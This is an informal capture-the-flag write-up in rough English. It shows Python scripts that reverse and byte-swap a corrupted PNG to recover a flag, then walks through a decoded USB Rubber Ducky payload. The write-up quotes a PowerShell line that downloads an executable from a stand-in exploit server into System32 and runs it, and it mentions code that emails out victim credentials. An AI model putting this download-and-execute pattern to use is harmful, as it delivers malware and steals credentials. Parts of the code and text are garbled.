after examine the file i know its image and bottom of it must be on top
f1 = open("file111", "w")
with open("flag.png", "r") as myfile:
data = myfile.read()
rev = data[::-1]
f1.write(rev)
f1.close()and cat flag.png | xxd -r -ps > flagx.png
all of value switched, my script
def swap_bytes(file_path):
# Read the file content as bytes
with open(file_path, "rb") as file:
content = file.read()
# Create a bytearray for the swapped content
swapped_content = bytearray()
# Swap the positions of every two bytes
for i in range(0, len(content), 2):
if i + 1 < len(content):
swapped_content.extend(content[i + 1:i - 1:-1])
else:
swapped_content.append(content[i])
# Write the swapped content back to the file
with open(file_path, "wb") as file:
file.write(swapped_content)
# Provide the path to your file
file_path = "flag"
# Call the function to swap the position of bytes in the file
swap_bytes(file_path)after this will find two value removed from header add it
after reading description
is a malicious payload. All happens in a sudden when he connected a brand new device gotten
its mean by connected a brand new device gotten, a usb
after examine file and read description i knew its USB RUBBER DUCKY
i uploaded it on this site to decode file
its powershell code, we can analysis it using two method execute it line by line and show output or read code
(New-Object Net.Webclient).DownloadFile('@C:#Windows#System32#51729.exe@">http://myexploitserverSBA.com',@C:#Windows#System32#51729.exe@); Start-Process -FilePath @C:#Windows#System32#51729.exeits cod to download file 51729.exe
download from: http://myexploitserverSBA.com
and save it on: C:\Windows\System32\51729.exe
its need username and password
its code to send email
Sender: victimsender@gmail.com
Password: mysupersecretpassword
FLAG{victimsender_mysupersecretpassword}
